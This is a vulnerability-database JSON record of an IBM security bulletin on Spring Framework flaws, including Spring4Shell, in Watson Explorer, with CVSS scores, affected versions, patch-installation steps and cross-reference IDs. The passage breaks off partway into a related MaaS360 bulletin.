DATABASE RESOURCES PRICING ABOUT US

{"id": "F426BDEEA0109CBE44C73C53461CE7144BDD04ADCF7EC044CE76723EAE672095", "vendorId": null, "type": "ibm", "bulletinFamily": "software", "title": "Security Bulletin: Vulnerability exists for Spring Framework in Watson Explorer (CVE-2021-22060, CVE-2022-22965, CVE-2022-22950)", "description": "## Summary\n\nSecurity vulnerability in Spring Framework affects IBM Watson Explorer. IBM Watson Explorer has addressed this vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.9 \n \nIBM Watson Explorer Foundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - 11.0.2.13 \n \n## Remediation/Fixes\n\n**Affected Product**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition \nFoundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9\n\n| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/12.0.x?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539806>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEFoundational-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to &lt;install_dir&gt;/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to &lt;install_dir&gt;/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.9| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V12.0.3.9 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539808>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.9&platform=All&function=all>): **12.0.3.9-WS-WatsonExplorer-DAEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to &lt;install_dir&gt;/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to &lt;install_dir&gt;/lib\n 5. Start all services \nesadmin start \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nQuery Modifier service is affected by this vulnerability. If Query Modifier service is installed (see [Installing Query Modifier](<https://www.ibm.com/docs/en/watson-explorer/11.0.2?topic=explorer-installing-query-modifier>)), please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<https://www.ibm.com/support/pages/node/6539814>)).\n 2. Download the interim fix for your edition (Enterprise or Advanced) from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.11&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-&lt;Edition&gt;Foundational-IF001 **(EE for Enterprise Edition, AE for Advanced Edition).\n 3. To apply the fix, follow the steps below. \n\n 1. Stop Query Modifier service if it is running \n\n * Linux: Run /etc/init.d/querymodifier stop\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Stop Service button.\n 2. Navigate to &lt;install_dir&gt;/Engine/nlq\n 3. Rename querymodifier.jar to querymodifier.jar.bak\n 4. Copy the downloaded querymodifier.jar to &lt;install_dir&gt;/Engine/nlq\n 5. Run install command \n\n * Linux: querymodifier-install.sh\n * Windows: querymodifier-install.ps1\n 6. Start Query Modifier service if you use the service \n\n * Linux: Run /etc/init.d/querymodifier start\n * Windows: Open the Service window, choose the Query Modifier Service, and click the Start Service button. \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.13| \n\nNatural Language Query service is affected by this vulnerability. Please follow the steps below.\n\n 1. If you have not already installed, install V11.0.2.13 (see the Fix Pack [download document](<http://www.ibm.com/support/pages/node/6497905>)).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.13&platform=All&function=all>): **11.0.2.13-WS-WatsonExplorer-AEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to &lt;install_dir&gt;/lib\n 3. Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to &lt;install_dir&gt;/lib\n 5. Start all services \nesadmin start \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "published": "2022-04-22T11:43:07", "modified": "2022-04-22T11:43:07", "epss": [{"cve": "CVE-2021-22060", "epss": 0.00052, "percentile": 0.18425, "modified": "2023-05-27"}, {"cve": "CVE-2022-22950", "epss": 0.00072, "percentile": 0.29455, "modified": "2023-06-14"}, {"cve": "CVE-2022-22965", "epss": 0.97506, "percentile": 0.99963, "modified": "2023-06-14"}], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.ibm.com/support/pages/node/6573715", "reporter": "IBM", "references": [], "cvelist": ["CVE-2021-22060", "CVE-2022-22950", "CVE-2022-22965"], "immutableFields": [], "lastseen": "2023-06-24T06:06:38", "viewCount": 5, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:F4BF02AE-B090-4307-89AA-47E57C92EC8F"]}, {"type": "avleonov", "idList": ["AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C"]}, {"type": "cert", "idList": ["VU:970766"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0104"]}, {"type": "checkpoint_security", "idList": ["CPS:SK178605"]}, {"type": "cisa", "idList": ["CISA:6CCB59AFE6C3747D79017EDD3CC21673"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2022-22965"]}, {"type": "cisco", "idList": ["CISCO-SA-JAVA-SPRING-RCE-ZX9GUC67"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:D24EF96EB1845EA8878001F85C1C2C75"]}, {"type": "cnvd", "idList": ["CNVD-2022-09799"]}, {"type": "cve", "idList": ["CVE-2021-22060", "CVE-2022-22950", "CVE-2022-22965"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-22060", "DEBIANCVE:CVE-2022-22950", "DEBIANCVE:CVE-2022-22965"]}, {"type": "f5", "idList": ["F5:K11510688"]}, {"type": "fortinet", "idList": ["FG-IR-22-072"]}, {"type": "github", "idList": ["GHSA-36P3-WJMG-H94X", "GHSA-558X-2XJG-6232", "GHSA-6GF2-PVQW-37PH"]}, {"type": "githubexploit", "idList": ["0018F9FA-176E-52D1-B790-5C67C302BC74", "00F5B330-30A9-5854-B811-41A3DCE5A4F8", "0126EBDA-4ED9-50FA-BDE5-873011FCD9B6", "0273F07C-E2F1-5454-85F6-6B58CCA854A3", "0DAD2A7F-FA26-53F7-AB9D-7850BD9C666E", "0E679B3E-C2C3-5C8B-94E1-FC6EDCBB08F0", "16067E19-368D-5FF5-895D-9BA9E14921CE", "17C63238-7AC4-5195-8FAC-88F0AB4E8F77", "18E406F3-7737-558F-9993-BD12421447B4", "1F4670D2-70D1-5F68-B5BB-2674FB754D26", "21FA1164-A4AD-57B4-8CFE-6B9B5EE9D199", "2A4F88C2-35A7-5185-ABC0-90D0A5396D8F", "36B8C1D8-41AC-5238-B870-2254AE996A4C", "38D4A58E-3B24-5D5E-AE07-5568C6A571C4", "397046C4-338E-5CCC-AD0A-687CA3551B7C", "3B4FEC21-04C2-5299-BFD8-3F9AA518E694", "3DB87825-2C58-5ABC-8BA3-E1CB80AFB11E", "402AA694-D65B-59F0-9CAC-8D4AA40893B4", "40B1BD3D-722E-5B72-A0D3-98A5729214D3", "52AD8D8E-65ED-5B49-A85D-202C43107E6B", "552E4AC2-693D-5E49-B56E-E5473F4241E9", "5D705C67-17AA-5E5C-A72D-A1ED6F4DEDA7", "608612F7-69E9-5491-B453-5DE098B798CA", "661FCFFE-E5C3-5CF9-9CD5-68869CEDED1E", "679F3E9E-1555-5391-86FF-CD3D67D80BDD", "69C8078C-1B8D-5B51-8951-4342A675A93D", "6A9484BA-BE10-5232-91F4-678892E7E6DD", "6E5C078B-B2FA-520B-964A-D7055FD4EB0A", "701F758F-BBA0-582C-AE23-AA3C515F6A9F", "75235F83-D7F4-570F-B966-72159CCBA5CB", "7883CC8E-9B35-5C0F-AE2E-271FAC17648B", "79D5BEFA-C5B9-56B6-B78E-4C663DB2A6C9", "7D29AFE9-2E1C-597D-80A3-49E03F52D903", "81DFF6A6-4518-543A-B06C-E7A6466ACB88", "85BCA050-E6D6-55FF-A843-F49E52F30346", "866A8BD8-7D36-53DA-AA66-A0064438E2A5", "89B78640-ACE2-5A00-845E-1CEFFFDD4A2E", "8AE63777-720A-5FEB-9A8B-B7A6577008DA", "915DAB75-3A6F-57CC-824E-106D6ACD652D", "91C0D03D-8468-59A7-B3B7-F6B118A62FFB", "9538B7BA-979F-523C-9913-4FE62CF77C5C", "9762BA59-813F-50C2-94CB-842DFAE750D5", "9B3AD93D-3EB7-516A-8F64-439D6260F866", "A0648F78-7165-5CA8-82DC-B34350E2DDC6", "A6262D7C-E486-57FA-BFE3-D7774CB085C9", "A8866ED4-A944-571F-8135-6138A2E9B568", "AE9F0F3B-00DE-5B73-87A1-BA592FA6E616", "AF11EF27-730D-5BA1-8B1D-7676A6FFCEAF", "B0EA173F-FDE3-5401-BE03-BEF429622CF2", "B158F1AE-13DF-5F49-88D5-73B5B6183926", "B71645C4-F039-552B-A3E1-C7376EB2DF53", "C4EB8052-6E91-5327-87BE-51E8490B0A4E", "C6653FFB-B7A6-54D8-83C9-300A13AC41F4", "CAD3F237-9F09-5818-ADE3-DF36E8350D41", "CB56CEFA-343E-5B20-9D5B-C076205FBF6F", "CFF7A226-3523-52E0-8A6C-0D0E6A7BEBD6", "D088978F-AFD3-56B5-A461-39DCB022A11E", "D09EAEC3-7B66-5E76-BF91-64C048C7D58D", "D30073F4-9BB7-54D9-A5F6-DCCA5A005D4D", "DF61600D-38EB-5DD1-862B-290A1B4D1019", "EA9501F7-CC4E-5C60-ACF3-F636E7F54C6F", "EBD1ED76-3887-570C-86DD-EC9C7ADB1880", "EE4B4CDB-5690-556D-9581-E198CF03A9BE", "EF55EC2D-994E-5971-8941-B595536F5992", "F09161EA-B10D-5DBF-B548-6F9BE7EE20B2", "F46FFDD3-4C3B-5BD6-A69D-43F2CA80D469", "FACAC290-D83E-5B87-B534-640F9C566696", "FF4B608A-EAF3-5EFC-921B-248F48F14720"]}, {"type": "hivepro", "idList": ["HIVEPRO:21EBEC4DE35422B57481E3DF94E6EA07", "HIVEPRO:41D5BC8D50B4CA10D9CCDA18E6528C27", "HIVEPRO:C037186E3B2166871D34825A7A6719EE"]}, {"type": "ibm", "idList": ["0465751AC2B09E6749CD032D525B17660008B7BDE693E1A430E27B2E32A33438", "07FEC8A129A779FAB145D3092FB4D733884D03DF23AA13470BF539F0AAE36C84", "0873F460B0C56BEFFB7C20248A3B9104F79891FA48CE8B004739684341A51D1D", "14108283F9157C4F2A38313CFBD3F47CFDC207CBE84809E04B7E197DA546B8D3", "1EA754AFF092ED1712E3DBFA763C4962C7EF40031818AB374A5E52A9E9586AAD", "22F3632F9800C8C7D12EDA0C85AC627F2AABCAA068D310065EEF12F9F4A345C4", "23258712AF0C6FF3D199FB0C84691351D550E3A4E86DEF3F1A107BF53AC16647", "2BE1B762E9F077419A696E0C1B88E2D3F236BE3549BFC2182468480E071BF032", "2F810DF5129E61B7AECC07F3698A4E88FEDD4A1E7CA3A999FA93E04C4733C72C", "2FB703AAD3FC5C2BE7EED7EC7E69FEBE209E6C70177FEA76C552605DF83D85ED", "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "3AAC421D0DF5831B3220FCCBA6EA78CC01A191BC68D1B4BF16F97C53C8358B64", "471BEEF44DE6C27461378C7D110744F38E295FB10C4A50D100750E5E0D7941A0", "4AF3DEB82989B4E6746A3E3F13D975DBE8BF4FDB968286C60FFA2743AA829CC4", "5303EB56B374789D2F25DD42CDE200B10A36458869D3BC5FB7882728637FFBF5", "537163AF6A43E9635AC6244334A6987334AAAED355BDEC033C662E7748C0C124", "55BD84BAE8C7A14BA43B1D5F808B6528E4FBEF810015A85F798847837C477C2F", "656937FA945DE5E58B9B5C0431A830AA521D479596EA01ACED0A20A166C4E3B3", "67BA75B2F60B75FF432F4A7CBDBC2D43DE52B633C04D3C54ADA035D39D2605F7", "6C0C64141920EE55899BAEC8A62C876633A02F40707156E9F4782FB71BDA3A8D", "6C544B97B62B9464D51C78F9B268DAFEF4ADE09A38B1D9BEF0D8564D5CC42D88", "73A0E3B8972417A5C5268EE0E3803B9B8C2E0463C9659C6C828573AC1D00D1AB", "78AC818528F1ED5E96DF9765AA477784E752DB03E5EC0169C89AD690326E3F5F", "81F73DF562970E5239B639CE59B471B9D34E39C4A5BDD496165656D76C34B09B", "8D1FFB0AFC90D6F732CB992E0BDEB82F435593D96A68A03F6DD265E83892C473", "8EA98A1ACD7FB64C20AF5E150C5876B7A376F3920E71B4315AC3EAC3F292126E", "8F4CAEB4814182DEBFBE7DFCA9FC13E3577204C307181835FA0E1CA012CAD9E1", "933F16C198EDF616BD60B2C55B4AE9B642F3BD83CA146DEBB0E52EC9050248AF", "9559CE1CF845BE27801B9A76018F0E7FFBD3159BCFFEE9D25526E6D24FA5F367", "9881226D0C430B3D1A6167EC18E2DA00B1048D439BAB0713E00099F02830547C", "98E790BB04C04429A117CD716BBD2F338208EDD76B0775A28921DFAD56715A85", "A871939B5F51CA69B0EDBC21D1816A26D5E84C73FB45D47DF354F899F5F6BB9B", "A97F6751F71164D0A07AD868814BD46D147EF591C7234360EA8F62B2317AA675", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "B547E4473646186969A14DFF0C2EB7D3D14D2E03EBA009074D6083D7482CB50F", "B65E10799869808B38D96576AA4BC705E6DCC5744AAC77554C2319CB82A9DE27", "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "C0C635C3D1BDFFF4279719843730FED33753DFD9A52C5B43AE4A48433A539739", "C602AE40F6974D4EE4D596F81D007D4F74282F20DC8B4859AE08925E2CE79326", "CE1EA8BD930C36AD90F7CB9A4D45A1E00F086D40B88449DF5CAD4F426F6C3DF7", "D259E621EF9ECC71F1E5CA25BD5CC4DDE78CFECBB5FC21F2E4BCB16169E0B602", "D5953B5AA5D620CA09590EAFE9008DB4A5BD219E8F43809D51B746D7643FA0F7", "D77134C81C99E57B976FD13B327D499D7859624EF6E1B9534595C21A83A1761B", "D9E06E5C382B357DD50008C0D277DB7D1B6D088C158C56C3D022303F1DFC00A4", "DA39104C275021EF88649293DFAF282637E8219443A30527A58A6E25E7ABA491", "DD71E3BE311976CFF7FE89F0916C7047300E0A1E779B1D8D85CA991081F0FBC3", "E04F9DE1174EFB4A26CD756DF59E4C46606A4BD4063992B465E76804515C6833", "E0AC0F2CEF0686FD5D35D040E442195982E92EF98BDFD841F5F62D37D0337B68", "E4D093275B3398CF07F3141B553D072C5304E4F560EE4AEFD306FE5B5472E00B", "E7653A5862D76B5A32167F623532FE5567AFABF9A426F06C2CBA21BE4039657F", "E9F0B13DD28C1AFA3EA944A83A0281284C2444069758D5085ED5787CB960A8C5", "EAC404329213DF471FF757B7F009DD8A087FC2C57793182718799AB73514DB48", "EB58ABDFAA1D2A9C4F164D6FC9FD899843DF1F1028ECDA035A0F0C34CD298FAD", "EBCC12197854D7C444B518B80A223576FCB219A088A0CC929C19FF2993DC431A", "ED11CF0606100E816592CB9CC87F176EF4BB64094BA5B7978B3810737572EBA4", "EDAF5143E634E5EF55D5C0186ECF166CE8CE37DFE44681979D15F0D7CA2DAFAD", "EF2166DB5EE8BD87E1440D3823C327B8BCA46A3FD349720520FD40C591911F30", "F243281320AFD7E2710EDC7B3D2DE73901C6546A063CD6DB1074893EA50F7F8E"]}, {"type": "ics", "idList": ["ICSA-22-286-05"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B"]}, {"type": "kitploit", "idList": ["KITPLOIT:3050371869908791295", "KITPLOIT:6278364996548285306"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30F9B0094E0BC177A7D657BF67D87E39"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-SPRING_FRAMEWORK_RCE_SPRING4SHELL-"]}, {"type": "mmpc", "idList": ["MMPC:07417E2EE012BAE0350B156AD2AE30B3", "MMPC:0FBB61490D4A94C83AEE14DDEE722297"]}, {"type": "msrc", "idList": ["MSRC:4016FF02733260CBC5200B5091666FD4", "MSRC:68FA6D02FA64FF61F41A7B1A8E364197", "MSRC:6DA934C9E783C787D408548AA6F1CEC3", "MSRC:A49EE2D875C0E490BD326B3CDDB7399F"]}, {"type": "mssecure", "idList": ["MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297"]}, {"type": "nessus", "idList": ["DELL_WYSE_MANAGEMENT_SUITE_DSA-2022-098.NASL", "EMC_NETWORKER_DSA-2022-350.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "ORACLE_BI_PUBLISHER_OAS_CPU_JUL_2022.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2022.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2022.NASL", "REDHAT-RHSA-2022-5555.NASL", "SPRING4SHELL.NBIN", "SPRING_CVE-2022-22950.NASL", "SPRING_CVE-2022-22965_LOCAL.NASL", "TOMCAT_10_0_20.NASL", "TOMCAT_8_5_78.NASL", "TOMCAT_9_0_62.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUAPR2023", "ORACLE:CPUJAN2023", "ORACLE:CPUJUL2022", "ORACLE:CPUOCT2022"]}, {"type": "osv", "idList": ["OSV:GHSA-36P3-WJMG-H94X", "OSV:GHSA-558X-2XJG-6232", "OSV:GHSA-6GF2-PVQW-37PH"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167011"]}, {"type": "paloalto", "idList": ["PA-CVE-2022-22963"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:3F273F13C86516B494271DB7BE04A954", "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:D1FC7658A8AB3554F3796CEE14DA3320"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "RAPID7BLOG:07EA4EC150B77E4EB3557E1B1BA39725", "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "RAPID7BLOG:3CB617802DB281BCA8BA6057AE3A98E0", "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "RAPID7BLOG:66B9F80A5ED88EFA9D054CBCE8AA19A5", "RAPID7BLOG:80C2CFBF70B3668FC60A8C97D27CA478", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5"]}, {"type": "redhat", "idList": ["RHSA-2022:1306", "RHSA-2022:1333", "RHSA-2022:1360", "RHSA-2022:1378", "RHSA-2022:1379", "RHSA-2022:1626", "RHSA-2022:1627", "RHSA-2022:4880", "RHSA-2022:5532", "RHSA-2022:5555", "RHSA-2022:5903", "RHSA-2022:8761"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-22060", "RH:CVE-2022-22950", "RH:CVE-2022-22963", "RH:CVE-2022-22965"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "spring", "idList": ["SPRING:0A31867D9351CED0BD42C5AD9FB90F8C", "SPRING:DA8F6AA20460EB2D550732A7F74584F6", "SPRING:DE384E814B204ABC68C9A98C00ACA572", "SPRING:EA9C08B2E57AC70E90A896D25F4A8BEE"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3587BB077717B0512A9D0EFCCBE8770B"]}, {"type": "thn", "idList": ["THN:51196AEF32803B9BBB839D4CADBF5B38", "THN:7A3DFDA680FEA7FB77640D29F9D3E3E2", "THN:8FDA592D55831C1C4E3583B81FABA962", "THN:9F9D436651F16F99B6EA52F0DB9AE75C", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "trellix", "idList": ["TRELLIX:33C611A7064C89E309C4A45CAE585BD5", "TRELLIX:341471F990B5DC7BFF1C28F924F10E32"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3BBEDAD3D1AE692D361A31D5E9AE2538", "TRENDMICROBLOG:59C3D813302731E6DE220FB088280F67", "TRENDMICROBLOG:AFF0912EF635E2446F0D546515038F73"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-22060", "UB:CVE-2022-22950", "UB:CVE-2022-22965"]}, {"type": "vaadin", "idList": ["VAADIN:ADVISORY-2022-04-01"]}, {"type": "veracode", "idList": ["VERACODE:34883", "VERACODE:35014"]}, {"type": "vmware", "idList": ["VMSA-2022-0010", "VMSA-2022-0010.1", "VMSA-2022-0010.3", "VMSA-2022-0010.4", "VMSA-2022-0010.5"]}, {"type": "zdt", "idList": ["1337DAY-ID-37692"]}]}, "affected_software": {"major_version": [{"name": "watson explorer", "version": 11}, {"name": "watson explorer", "version": 11}, {"name": "watson explorer", "version": 11}, {"name": "watson explorer", "version": 12}, {"name": "watson explorer", "version": 12}, {"name": "watson explorer", "version": 12}, {"name": "watson explorer", "version": 12}]}, "epss": [{"cve": "CVE-2021-22060", "epss": 0.00052, "percentile": 0.18418, "modified": "2023-05-02"}, {"cve": "CVE-2022-22950", "epss": 0.00072, "percentile": 0.29287, "modified": "2023-05-02"}, {"cve": "CVE-2022-22965", "epss": 0.97527, "percentile": 0.99979, "modified": "2023-05-02"}], "vulnersScore": 0.8}, "_state": {"score": 1687589590, "dependencies": 1687588226, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "3f7ee2e86ba66eeb6209ffd44797b251"}, "affectedSoftware": [{"version": "11.0.0", "operator": "eq", "name": "watson explorer"}, {"version": "11.0.1", "operator": "eq", "name": "watson explorer"}, {"version": "11.0.2", "operator": "eq", "name": "watson explorer"}, {"version": "12.0.0", "operator": "eq", "name": "watson explorer"}, {"version": "12.0.1", "operator": "eq", "name": "watson explorer"}, {"version": "12.0.2", "operator": "eq", "name": "watson explorer"}, {"version": "12.0.3", "operator": "eq", "name": "watson explorer"}]}

{"ibm": [{"lastseen": "2023-06-24T06:04:06", "description": "## Summary\n\nVulnerabilities contained within 3rd party components were identified and remediated in the IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and MaaS360 VPN module.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-0547](<https://vulners.com/cve/CVE-2022-0547>) \n** DESCRIPTION: **OpenVPN could allow a remote attacker to bypass security restrictions, caused by an authentication bypass vulnerability in external authentication plug-ins. By sending a specially-crafted request using multiple deferred authentication replies, an attacker could exploit this vulnerability to gain access with only partially correct credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ 